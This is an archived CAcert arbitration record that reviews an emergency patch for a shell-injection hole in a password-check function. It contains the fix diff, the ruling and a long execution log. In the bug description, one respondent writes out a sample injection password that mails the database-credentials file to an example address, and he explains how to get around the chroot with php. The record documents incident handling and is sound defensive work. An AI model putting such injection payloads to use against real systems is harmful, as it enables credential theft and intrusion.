Arbitrations/a20120614.1

Case Number: a20120614.1
Status: closed
Claimants: CAcert
Respondents: Wytze R, Michael T
Initial Case Manager: AlexRobertson
Case Manager: MartinGummi
Arbitrator: EvaStöwe
former Arbitrator: MarioLipinski
Date of arbitration start: 2013-09-14
Date of ruling: 2014-05-26
Case closed: 2015-02-28
Complaint: Emergency Patch
Relief: TBD

Before: Arbitrator Eva Stöwe, former Arbitrator Mario Lipinski (A), Respondents: Wytze R(R1), Michael T(R2), Claimant: CAcert (C), Case: a20120614.1

History Log

other persons:

SA1/2: software assessor 1/2

ST1: software tester 1

DRO: Dispute Resolution Officer

2012-06-14 (issue.c.o) case s20120614.165
2012-06-14 (iCM): added to wiki, request for CM / A
2013-09-14 (A): Appointed CM / A.
2014-01-11 (CM): Chat between CM / A about the case
2014-01-12 (CM): Change Arbitrator to Eva Stöwe
2014-01-28 (A): added note to bug that some points of the review and test-process documented there are not clear
2014-01-29 (A): contacted software assessor during software session, to clarify who should be R and C in this case, so that an init mail could be sent
2014-01-29 afterwards during the same software session, A was intensely asked by at least two persons to stall the arbitration process for a short period of time, with reasons that were not comprehensible by A - A refused
2014-01-29 (A): reports above incident to DRO (and CM, who was present at the incident)
2014-01-30 (DRO): acknowledges receipt of As report
2014-02-01 (A): send init mail to R1 and R2
2014-02-01 (R1): ok to information of being R in the case, ack CCA accepted
2014-02-01 (R2): ack init mail, accept DRP and CCA
2014-02-01 (A): asked R2 about more information on the possible risks and attack of the bug
2014-02-03 (R2): describes possible attack - with some effort an attacker could do pretty serious stuff like issuing false certificates
2014-02-03 (A): questions to R2 about test status of patch, his information about the emergency procedure, privacy status of bug and related things
2014-02-04 (R2): answers questions
2014-02-04 (A): comments on answers from R2 and asks for a resending of last mail since A and CM could not verify the signature for R2
2014-02-04 (A): asks SA1 to confirm that he reviewed the bug
2014-02-04 (CM): asks ST1 to explain his test report
2014-02-04 (A): put re-testing of patch on agenda during software session, when items were collected
2014-02-04 (SA1): cannot remember - can search for mails or chat logs
2014-02-05 (R2): resends last mail from 2014-02-03 with correct signature
2014-02-05 (R2): comments last comments from A
2014-02-05 (A): tries to clarify some of her lasts comments to R2
2014-02-05 (R2): tries to summarise current test / review state of patch
2014-02-23 (CM): reminder to ST1
2014-02-25 (A): discussed the test and review status and further proceedings at software team meeting with R2, SA1, ST1 and SA2 - agreed to test the patch again, SA2 will write a review, SA1 should also try to do his review again (or look up anything about his previous review)
2014-02-26 (ST1): no black or white answer possible but there is some documentation
2014-02-26 (A): thanks ST1 for his answer
2014-02-26 (A): asks R1 some questions about the detection of the bug and the communication for the release of the patch
2014-02-27 (ST1): provides some more facts
2014-02-27 (R1): answers As questions
2014-03-01 (SA2): provides a review - "the current solution is suitable as first aid and as first aid only" - NACK for patch as such
2014-03-03 (A, CM): voice-session with internal auditor: internal auditor gives recommendation how to proceed in this case, A recommends the case for internal audit
2014-03-18 (software test team - including A, CM): patch was tested again - one issue was detected, fixed, reviewed and retested, a followup-bug was issued
2014-04-01 (software team): sends patch-update of bug-1070 to criticals to apply it
2014-04-01 (critical team): installs patch-update of bug-1070
2014-04-01 (A): ensures that software team leader sees no further reasons to keep bug as private (irc)
2014-04-01 (A): tells software team leader to set bug-1070 to pubic (as it was private up until then, because it was not officially clear if the security issue was solved)
2014-04-01 (software team leader): sets bug-1070 to public
2014-04-05 (A): asks R1 if there was some documentation done on the side of critical team about the emergency patch
2014-04-07 (R1): documentation consists of mail, that patch was applied
2014-04-19 (A): asks internal auditor for opinion on current habit of software team to handle emergency patches without emergency processes but with normal procedures
2014-05-26 (A): ruling - send to R1, R2, critical team, software team, internal auditor, board, arbitration team, CM
2014-06-10 (internal Auditor): asks for more time
2014-06-10 (A): allowes internal Auditor to take some more days
2014-06-10 (critical team lead): describes how to find emergency actions of critical team via seraching through a mailing list
2014-06-13 (internal Auditor, A): chat about clarification what is requested
2014-06-16 (internal Auditor): requests time before 06-21, granted by A (chat)
2014-06-20 (critical team lead): reports about execution: 1. added emergency patch process to SM, 2. reports about current process, 3. nothing to do, 4. informs about mail sent to software team
2014-06-22 (A): asks for non-mandatory part of 1.; answers cirtical team that SP asks for special documentation of emergency activities; 3. asks internal Auditor for report, as self-set-deadline is over; 4. not happy with suggested procedure, suggests discussion with software team and internal auditor; asks board to follow agenda items resulting from this case higher priority
2014-06-22 (internal Auditor): report about current software tests and reviews, no major problems detected, but room for improvement
2014-06-23 (A): describes current software testing procedures in more detail; asks internal auditor for suggestions how to improve those to meet his proposals
2014-06-25 (SA2): asks internal Auditor about more details per reviewed bug
2014-06-26 (critical team lead): disagrees that special documentation for emergency activities is requiered by the SP
2014-06-26 (internal Auditor): rejects SA2s request to provide more information on specific reports, as he did the as an auditor and auditors do not identify objects or persons that are not to the rule
2104-07-06 (A): describes where SP requires special documentation of emergency activity
2014-07-06 (critical team lead): disagrees with A's answer
2014-07-13 (A): requests answer about testing procedure improvements from internal Auditor until 2014-07-27
2014-07-18 (A): sets deadlines for all affected parties from the ruling, to at least report back, some comments about what was done
2014-07-18 (A): sets deadlines for all affected parties from the ruling, to at least report back, some comments about what was done
2014-07-18 (internal Auditor): does not see the responsibility to deliver more than a recommendation
2014-07-18 (A): answers (internal Auditor) that A was asking for a recommendation, will drop the issue if there is no further recommendation
2014-08-09 (A, internal Auditor): direct conversation regarding software tests and reviews
2014-08-12 (A): reminds people about case - reports results of a conversation with the internal auditor regarding software tests and reviews
2014-08-13 (A): discussed the results of the conversation with the software team in the software team session, software team makes some good proposals how to change procedures
2014-08-13 (an SA): asks if he understood the suggestions from the last mail correctly
2014-08-13 (A): clarifies what was suggested and reports about session with the software team
2014-08-14 (A): describes the agreed changes to the devel-list
2014-08-14 (R1): asks A to drop the execution of part 2. from the ruling as he does not see the need for it, else asks the internal Auditor to give a statement
2015-01-17 (A): again asks about status of the execution of all parts of the ruling. Reminds about DRP and CCA.
2015-01-19 (R1): provides update on executions
2015-01-19 (A): comments execution updates
2015-01-19 (A): asks internal Auditor if the emergency report is sufficient for his needs
2015-01-20 (internal Auditor): has to be sufficient
2015-01-30 (A): thanks all and final comment
2015-01-30 (A): asks CM if case can be closed
2015-02-03 ("Prospect CAcert SW TL"): no answer so far as we do not want to change anything
2015-02-08 (A): sad that software does not want to improve found issues, case should be closed, soon
2015-02-28 (A): informs CM that A will close case today, if there is no intervention
2015-02-28 (A): closes case

Original Dispute, Discovery (Private Part) (optional)

Link to Arbitration case a20120614.1 (Private Part), Access for (CM) + (A) only

EOT Private Part

Dispute

From team leader CAcert critical system administrator team

> With reference to:
>   http://wiki.cacert.org/Software/Assessment/Documentation/EmergencyPatches
> I am reporting that on June 14, 2012 an emergency patch has applied
> to the webdb production server following method #2 documented in
> the webpage referenced above.
> The critical issue in case is the side effect noted in Note #3056 of
> bug report http://bugs.cacert.org/view.php?id=1070 . After discussion
> in the critical sysadmin team, we have decided that this security
> problem is too serious to leave it unpatched during the time needed
> for the regular software assessment program. Therefore the (trivial)
> patch developed by [a software assessor] has been lifted from the cacert1
> test server and has directly been applied to the production server.
> The attached mail sent to cacert-systemlog@lists.cacert.org documents
> the details of the patch process.
> 
> (team leader CAcert critical system administrator team)

Emergency patch for http://bugs.cacert.org/view.php?id=1070
This issue is deemed to require emergency fixing since leaving
it unpatched would allow an attacker to execute arbitrary shell
commands as the web server user inside the chroot (note 003056
in the above bug).

In conjunction with the attached CVS changes a new tarball has been
made available incorporating all updates. The new tarball is available
through http://www.cacert.org/src-lic.php

uid=0(root) gid=0(root) groups=0(root)
general.php 1.94 1.95
Thu Jun 14 15:29:58 CEST 2012
Update of /var/lib/cvs/cacert/includes
In directory hlin:/home/cacert/www/includes

Modified Files:
        general.php 
Log Message:
Emergency patch for http://bugs.cacert.org/view.php?id=1070
This issue is deemed to require emergency fixing since leaving it unpatched
would allow an attacker to execute arbitrary shell commands as the web server
user inside the chroot (note 003056 in the above bug). 

===================================================================
RCS file: /var/lib/cvs/cacert/includes/general.php,v
retrieving revision 1.94
retrieving revision 1.95
diff -u -r1.94 -r1.95
--- general.php 2012/04/29 18:56:05     1.94
+++ general.php 2012/06/14 13:29:58     1.95
@@ -215,7 +215,8 @@
 
                //echo "Points due to name matches: $points<br/>";
 
-               $do = `grep '$pwd' /usr/share/dict/american-english`;
+               $shellpwd = escapeshellarg($pwd);
+               $do = `grep $shellpwd /usr/share/dict/american-english`;
                if($do)
                        $points--;

(Dispute kept private until bug was set to public, because of security considerations)

Preliminary Considerations

1. possible Conflict of Interests (CoI) of A / CM?

Both A and CM are members of the software test team, that meets regularly with the software assessor team. Normally this team is involved in the process of getting Patches for bugs ready to deploy, since 2 tests are needed before a patch may normally be handed over to the critical team to for deployment. (Procedures for SoftwarePatches)

Such a test may theoretically be coming from everybody. The most important requirement for a software test is that it is documented well in the bug tracker. The requirements to contribute to the tests are low and a lot of people are members of the group that gets invitations for regular meetings. Since by this every arbitrator is a potential software tester (and most of them are doing a test now and then), to be able to find a potential CoI one has to look at an involvement of the arbitrator in the life cycle of the bug, patch and test in question. Neither A nor CM were involved in any of those steps regarding the bug in question. In the case of A the process of reviewing and testing was marked as finished before A joined the CAcert community.

No CoI can be seen for A or CM.

2. Consequences of incident from 2014-01-29

The incident was witnessed by CM and later reported to the DRO (and CM) by A. It was also documented in this case. This was done because according to our principles we aim for transparency and report incidents. Especially in the context of security issues as this case handles.

The incident itself was classified as trivial by A. A is convinced, that the acting persons had only CAcerts (and As) best interests in mind and no bad intentions were present anywhere.

A sees no need for further actions, especially no need for a dispute. Since the acting persons are not related to this case in another way, there is no need to write their names here.

3. Who should be R and C in this case

DRP 2.2

[...]
 The Arbitrator reviews the Respondents and Claimants with a view to dismissal or joining of additional parties. E.g., support personnel may be joined if emergency action was taken.
[...]

One of the first steps for an arbitrator in a case is to identify the parties of the case. While the persons mentioned in the original dispute should be considered, the arbitrator can add or remove persons from that list.

The original dispute mentions R1 as claimant and "none" as respondent. This cannot be correct, since there has to be a respondent in any case. This being CAcert if no one in special can be identified. The same is the case for the part of claimant, if a dispute is filed outside of a role and not as an individual.

The example given in the DRP is one of a support member performing an emergency action, who should be joined.

The same should be true for persons in other roles who perform emergency actions.

This is especially the case, if a review through arbitration is included into the description of an emergency process. In the original dispute such a process was mentioned. Beside of a member of the critical sysadmin team, also a member of the software-assessor team is mentioned in that process. So the according person should be a candidate to be joined to the case as well.

Being a party in a case is not a bad thing - especially not in a review case for emergency actions. On the contrary, the parties of a case gain more rights in regard of the case. For example they should be informed about the course of the case directly by A and CM.

So, when in doubt about who should be a party of a case it is in the interest of the candidates that they will be added to the list. Because of this the acting software assessor (R2) should be a party of this case.

Even as R1 originally filed the dispute, the actions under review by this case are those of him and R2 and the interest to understand what happened is on the side of CAcert. So the claimant should be CAcert and the respondents R1 and R2. However this is merely a formality. It should not change the kind and course of the case.

Discovery

Reported facts

2012-08-14 Software-Assessment project team meeting tested patch bug #1070, checked logs. 1st and 2nd review by Software-Assessor, tested by 2 testers. Good to go to production.
Note #3056 of bug #1070
```
This could lead to an attacker executing arbitrary shell commands as the web servers user. Inside the chroot but this is enough for many things. 
```

Emergency Patch Process mentioned in the dispute:

Emergency Patch Process #2

A "critical" issue has been identified (critical admin or software-assessor declares it as an emergency issue)
A patch is prepared by a software-assessor, locally tested, transferred to a critical admin
Critical sysadmin deploys the patch to the critical system
Critical sysadmin documents the emergency patch procedure, files a dispute about an emergency issue handling under option 2
The patch is entered into the update cycle process with the push replication of the critical system repository to the git repository under Software-Assessment team control
The emergency patch process is reviewed by arbitration

Relevant times from bugtracker:

2012-06-04 11:02 Critical team leader issued a bug that could lead to an attack on the system.
2012-06-06 20:03 Software team member acknowledged the issue to be critical
2012-06-06 22:16 a patch was written, applied to the testserver and reviewed by a software team member
2012-06-14 13:37 critical team applied the patch to the production server
[2012-06-14 13:49 critical team leader filed dispute to review the process by arbitration]
2012-08-07 23:14 the patch passed second review (entered by someone else than reviewer)
2012-08-14 23:33 software test team finished testing of patch
2014-01-28 21:13 A asks for clarification of test status and second review
2014-03-01 10:07 another review - "the current solution is suitable as first aid and as first aid only" - NACK for patch as such
2014-03-18 22:43 additional patch (review by author)
2014-03-18 22:48 test by 3 testers (including A, CM), another issue found
2014-03-18 22:44 issue fixed, review by author
2014-03-18 22:45 re-test by same 3 testers
2014-03-18 22:46 review
2014-03-25 23:15 review
2014-04-01 14:36 critical team installed additional fix

Deliberation

Critical team and software identified an issue that both classified as "critical".
Critical team decided to act according to a predefined strategy for such situations instead of following normal processes.

While the review process is not defined, it should probably cover:

if the classification was correct, so that there was a need and reason for an emergency action
if there exists an authorised emergency process
if this process was followed correctly
if the original problem was solved
if other problems arose by this action
if there are any lessons learned for the future

classification of the issue for emergency action

Bug description by software team (R2)

The bug was in the function checkpw() which is used when a user sets a new password (on signup, lost password or password change) and should check whether the password is secure enough by checking several conditions like length, type of included characters etc.

One of these checks is also to do a lookup in an American English dictionary to exclude those words. To do this lookup a shell command was executed which did the lookup via standard UNIX tools. Now this shell command contained the password enclosed in single quotes so it should be interpreted as a single argument to the command doing the lookup, but that is not enough. If the password itself contains a single quote then
it pre-empts the surrounding quoting and can be interpreted as a command itself. Take for example the password:
    foo' /etc/group; mailx -s PWND eve@example.com <
/www/includes/mysql.php #

when you combine that with the shell command that's executed it becomes:
    grep 'foo' /etc/group; mailx -s PWND eve@example.com <
/www/includes/mysql.php #' /usr/share/dict/american-english

that would search for "foo" in the /etc/group file and then mail the contents of the mysql.php (which includes the database password) to the attacker. Everything after the "#" is ignored. After that, the attacker could do another attack based on the discovered credentials that modifies the database and thereby issues arbitrary certificates. So it is an arbitrary code execution attack.

There are a few things why the attack described above won't work directly:
- the server runs inside a chroot (an encapsulated environment) that doesn't contain the mailx programme, but the chroot contains a php executable so one could do a similar attack using that
- the chroot also doesn't contain a mysql executable that could be used for altering the database but that could also be circumvented by using the php executable
- $pwd is not actually the password as it's sent by the user but some escaping is applied earlier. To be precise:
    $pwd = trim(mysql_real_escape_string($USER_PASSWORD))
so some thought on what special characters can be used is probably needed but it's not an impossible task

So to summarise: with some effort an attacker could do pretty serious stuff like issuing false certificates.

Bug description from critical team (R1)

The risk of patch as outlined by Michael was that maybe certain passwords would not be accepted anymore by the system. That could be inconvenient to a very small number of users, but would not have affected system security in a negative way. But leaving the code unpatched, thus keeping open the shell escape exploit hole *deliberately*, would have left open the opportunity for serious breaches of system security. Since our code is public (as it should) anybody could have discovered this weakness by code inspection, and we wouldn't have any idea when this blackhat would decide to "hit".

The classification of the bug as "critical" so that it should be fixed fast with an emergency patch is sensible.

authorisation for the process

Critical team named Emergency Patch Process #2 as the basis for the actions that are under review.

The basis policy for softwaretam and critical team is the Security Policy (SP). This linkes to the Security Manual (SM) for further details.

In 7.4 and 7.5 SP and SM ask for at least one second review and a test before a patch is applied. This was not the case here.

The bug was classified as critical and SP/SM allow for some emergency actions beside of the normal procedures in some cases, if (later) authorised by an arbitrator. Emergency patching is not explicitely named in such a context.

SP/SM also allow team leaders to define procedures that than have to be linked in the SM. The named emergency patch process looks like if it was designed as such a procedure but it is not linked from the SM. So it is not in state.

Howere, there was a critical situation that called for some action. The general idea of the SP/SM indicates that in a critical situation some steps beside of the SP/SM may be taken if arbitration is asked for authorisation as soon as possible. This was done in the current case. Also it is better to follow a procedure, even as it is not linked to the SM correctly, than to either do nothing in a critical situation if the normal process cannot be followed or to just do anything else which may lead farther away from SP/SM than said policy.

Critical team also filed a dispute as soon as possible, to gain any missing authorisation.

Even while the Emergency Patch Process is not the correct authorisation for the actions that were done, the further review should be based on it, as the teams tried to keep to the ideas of SP/SM and said processes while being aware that they probably left their normal authorisation because of the critical situation.

review of execution of process

The Process requires:
- 2. A patch is prepared by a software-assessor, locally tested, transferred to a critical admin
Notes in bugtracker indicate:
- A patch was prepared by a software-assessor (and reviewed)
Interviews with R1 and R2 showed:
- there was no test done by R2 (the software assessor)
- there was no communication about the patch or the patch status between software team and critical team
- there was no transferral of the patch to a critical admin (R1 took the patch from the bugs database)
The Process requires:
- 4. Critical sysadmin documents the emergency patch procedure, files a dispute about an emergency issue handling under option 2
Wiki shows:
- Critical sysadmin filed a dispute about an emergency issue handling under option 2
Interview with R2 showed:
- There was no special documentation for emergency action, only normal mail for setting the patch life

Even as it is not part of the described process (which it probably should be!) there should be some words for later reviews and other actions on the side of software team.

effectiveness of the emergency patch

The patch was simple and solved the problem while not being optimal.

One issue was found during the test session asked for by the Arbitrator. This issue is fixed.

Also one reviewer stated that the patch has only be considered to be ok as emergency solution and that it should be followed by something else, eventually. But this does not affect the review for an emergency patch.

problems introduced by patch

According to SA2s there were some cases where the applied patch caused certain passwords to be sent to the logfile in cleartext.

This was later fixed after the review of SA2.

lessons learned

There is no indication that there were lessons learned from the bug, the patch or the emergency-process.

But hopefully the review has helped to improve some issues that were detected.

problems encountered during the review by arbitration

There is no information about what to do when reviewing an emergency patch process as arbitrator.
- It is not clear what is the subject of the review.
- It cannot be assumed that the arbitrator always has the expert knowledge to evaluate every decision made in the process (classification of the problem, software reviews, problem fixed?).
  - It may be that the arbitrator has to relay on the statements of the persons who executed the process - which are the subject of the review.
- However this was no real issue in this case, as people were quite helpful and there was no doubt about their statements being true.
The original documentation of the patch- test- and review-process in the bugtracker was so bad, that
- nobody could tell the arbitrator reliably that the second review actually happened
- what was the conclusion of the test-session exactly
When asked about this, the software team leader stated, that he would insist on another test and review if he would have to decide about the patch going life at that time
Some reason for nobody being able to tell what happened was that arbitration took some time before it got to the review (over 1,5 years later)
This is not optimal. But:
- The case was not marked as urgent (however it might be a good idea to so so in the future, but the security issue should be fixed independently of the later review by arbitration)
- The documentation should be enough to evaluate what happened at any time - even years later.
- At least the acting persons should have been able to tell what happened, based on the documentation.
- Both was not possible.
On the other hand, if the review of this case had taken place shortly after the dispute was filed probably most of the issues detected in this case would not have been found - and a small security relevant issue being kept open.
The current version of emergency patch procedure 2 (or the others) does not include
- any later reviews
- any later tests
So a patch done in a hurry because of an emergency would not only
- be set life without being tested and reviewed at the normal degree, but also
- not be needed to be reviewed and tested to this degree afterwards (at least if the arbitrator would not order this)
Especially when in a hurry and under pressure, one should check the results afterwards and look if some further issues are there - as this case showed, there could be
There is no indication that anybody did an investigation if the bug was exploited, even as SP and SM ask for investigations of security issues.
- As the current dispute only covers the review of the emergency process, such an investigation is not covered by the current dispute, so it cannot be done based on it in this arbitration case.
- SP may require for another arbitration case in the context of such an investigation.

Ruling

Regarding arbitration case a20120614.1[1] I come to the following ruling:

The emergency patch process #2 named from critical team as basis for the review of the patch process of bug #1070 was not followed in every detail. Some parts of communication between the teams was missing and needed documentation was either missing or insufficient. This led to a patch being installed without testing which was required by the named process.

According to SP/SM 1.4.3 processes need to be linked from the SM to be correctly installed. The process which the teams tried to follow as authorisation for leaving the normal processes and requirements for patches is not linked there. SP/SM do not define any other emergency patch process. So there was no direct authorisation by SP/SM, even when following emergency patch process #2.

But inside SP/SM a general idea regarding emergencies can be found to act fast in critical situations. In general SP/SM ask for documentation, communication between teams and review by arbitration if normal processes are not followed in cases of emergency.

So even if one keeps the details of the emergency patch process #2 out of focus, the missing elements were required: some special documentation on the side of critical team and communication about the selected patch process between the teams.

There was no communication between software and critical team about the execution of the emergency process, which could have prevented that an untested patch was installed. While the patch looks easy enough, one Software Assessor detected some issues that needed to be fixed by a later patch review.

SP/SM 5.6 declare that there should be special documentation of incidents / emergencies. Critical team presented the normal mails as documentation for the emergency installation. This is considered to be insufficient as one has to watch quite in detail to detect the emergency action within those mails - if at all.

Software team uses a bug-tracker for documentation. The documentation of #1070 was done in a manner that nobody was able to tell the review and test status, before the Arbitrator ordered another round of reviews and tests.

The Arbitrator and Case Manager of this case are regular members of current software sessions and are of the mind, that the documentation level in the bug-tracker has improved, so that this kind of issue may be resolved.

The status of patch #1070 is clarified and hopefully documented well enough through this case.

Since the teams showed the will to act according to our rules, even if they failed in details, no direct action because of the missing elements should be taken against the acting teams or team members as there is nothing that indicates those elements were missed intentionally. The same goes explicitly for the respondents of this case who are the according team leaders.

Critical and software teams should be advised to aim for better execution of emergency patches in the future.

There should be some further actions and considerations to avoid likewise problems in the future.

1. Software or Critical Team Leader should install a link to the emergency patch processes in the SM, as stated in SP/SM 1.4.3 and done for other emergency processes. While doing so, they should consider to update the emergency patch processes to also include later reviews and tests at least to the level, which is needed for non-emergency patches. They should also consider to include some kind of exploit research into the processes.

2.Critical team should install a Wiki-page (or something likewise accessible) for the documentation of special events as emergency patching.

3. Since A and CM cannot verify the current documentation within the bug-tracker from an objective point of view the internal Auditor should do a review of the documentation of current bugs in the bug-tracker to verify, if patch-review and test-status are at an acceptable and understandable state. The result of this review should be considered for further actions by the Arbitrator of this case.

4. Software team and critical team should find a way, that ensures both teams are aware of patches being installed via an emergency process.

1. - 4. should be done and reported by 2014-06-09.

Further some recommendations for issues found during this case, which are not directly covered by the dispute.

When asked for his recommendation for this case the internal auditor suggested to order some Incident Response Team to be installed.

SP/SM already ask for some incident respond precautions. For example there should be a key persons list installed. The one linked via the SM does not fit the requirements of the SM and it looks like it was not updated for some while. Since this list should be the basis for some Incident Response Team according SP/SM board and the teams are intensely advised to check and probably update said incident recovery elements, so that they match at least the requirements from SP/SM. It is also suggested to hear the internal Auditor for his ideas in this area.

One Software Assessor only gave his ACK for the patch because of it being an emergency patch. It is suggested that software team aims for a follow-up patch, soon.

There is also no indication, that anybody did any check, if there was an exploit of the bug. As this is not part of the current emergency patch process to be reviewed by this case, anything in this direction is not covered by the dispute. The Arbitrator can only suggest to either do some checks or to document why they are not needed.

Arbitration team should be advised to consider to define some guidelines how to review execution of processes as SP/SM ask for such reviews at many places.

Arbitration team should also be reminded, that emergency activity reviews could require some urgency since there may be some open points left by the acting teams which could be critical (like some patch being incomplete).

Hamburg, 2014-05-26

Execution

2014-05-26 (A): ruling - send to R1, R2, critical team, software team, internal auditor, board, arbitration team, CM
2014-06-10 (internal Auditor): asks for more time
2014-06-10 (A): allowes internal Auditor to take some more days
2014-06-13 (internal Auditor, A): chat about clarification what is requested
2014-06-16 (internal Auditor): requests time before 06-21, granted by A (chat)
2014-06-20 (critical team lead): reports about execution: 1. added emergency patch process to SM, 2. reports about current process, 3. nothing to do, 4. informs about mail sent to software team
2014-06-22 (A): asks for non-mandatory part of 1.; answers cirtical team that SP asks for special documentation of emergency activities; 3. asks internal Auditor for report, as self-set-deadline is over; 4. not happy with suggested procedure, suggests discussion with software team and internal auditor; asks board to follow agenda items resulting from this case higher priority
2014-06-22 (internal Auditor): report about current software tests and reviews, no major problems detected, but room for improvement
2014-06-23 (A): describes current software testing procedures in more detail; asks internal auditor for suggestions how to improve those to meet his proposals
2014-06-25 (SA2): asks internal Auditor about more details per reviewed bug
2014-06-26 (critical team lead): disagrees that special documentation for emergency activities is requiered by the SP
2014-06-26 (internal Auditor): rejects SA2s request to provide more information on specific reports, as he did the as an auditor and auditors do not identify objects or persons that are not to the rule
2104-07-06 (A): describes where SP requires special documentation of emergency activity
2014-07-06 (critical team lead): disagrees with A's answer
2014-07-13 (A): requests answer about testing procedure improvements from internal Auditor until 2014-07-27
2014-07-18 (A): sets deadlines for all affected parties from the ruling, to at least report back, some comments about what was done
2014-08-09 (A, internal Auditor): direct conversation regarding software tests and reviews
2014-08-12 (A): reminds people about case - reports results of a conversation with the internal auditor regarding software tests and reviews
2014-08-13 (A): discussed the results of the conversation with the software team in the software team session, software team makes some good proposals how to change procedures
2014-08-13 (an SA): asks if he understood the suggestions from the last mail correctly
2014-08-13 (A): clarifies what was suggested and reports about session with the software team
2014-08-14 (A): describes the agreed changes to the devel-list
2014-08-14 (R1): asks A to drop the execution of part 2. from the ruling as he does not see the need for it, else asks the internal Auditor to give a statement
2015-01-17 (A): again asks about status of the execution of all parts of the ruling. Reminds about DRP and CCA.
2015-01-19 (R1): provides update on executions
2015-01-19 (A): comments execution updates
2015-01-19 (A): asks internal Auditor if the emergency report is sufficient for his needs
2015-01-20 (internal Auditor): has to be sufficient
2015-01-30 (A): thanks all and final comment
2015-01-30 (A): asks CM if case can be closed
2015-02-03 ("Prospect CAcert SW TL"): no answer so far as we do not want to change anything
2015-02-08 (A): sad that software does not want to improve found issues, case should be closed, soon
2015-02-28 (A): informs CM that A will close case today, if there is no intervention
2015-02-28 (A): closes case

Changes proposed by and agreed with the Software team regarding software tests:

 1. a free-field will be added to the header of a bugtracker page. Here the test-scenarios should be described.

This should be done by the person who reports the bug, the person who enters the patch or by the software assessor who moves the patch to the testserver. Any such description should be improved if found insufficient.

 2. an additional step should be added to the patching process before a patch enters any "testing" status: "test-description added" (or something similar), so that this field should get the needed attention.

 3. Testers should not be limited to anything described in the field, but should at least cover this parts.

Last comment from A

Software and Critical team were involved in the original issue. The bigger problems were found to be on the software side. The biggest issue regarding critical team was seen to be some kind of communication.

However nearly the complete communication during the execution phase was done by critical team.

It is a little bit scary to see so little interest from the side of the software team for improvement of the processes that lead to a critical bug being on the productive system for about 1 1/2 years. To prevent something like this should be one of their core interests as they are responsible to prevent just such bugs getting there at all.

Similiar Cases

a20140422.2	Unapproved modification on Critical System
a20140625.1	Dispute against Critical
a20090810.1	Emergency code change without dual control